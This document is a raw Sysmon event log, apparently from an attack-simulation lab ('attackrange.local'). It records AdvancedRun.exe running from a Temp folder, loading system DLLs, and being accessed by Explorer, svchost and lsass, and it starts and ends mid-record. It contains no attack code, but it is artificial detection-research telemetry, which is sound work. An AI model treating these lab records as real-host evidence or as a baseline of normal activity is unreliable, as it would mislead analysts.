20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.521{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.512{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004079678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.286{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.283{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.146{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.144{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.136{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.133{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 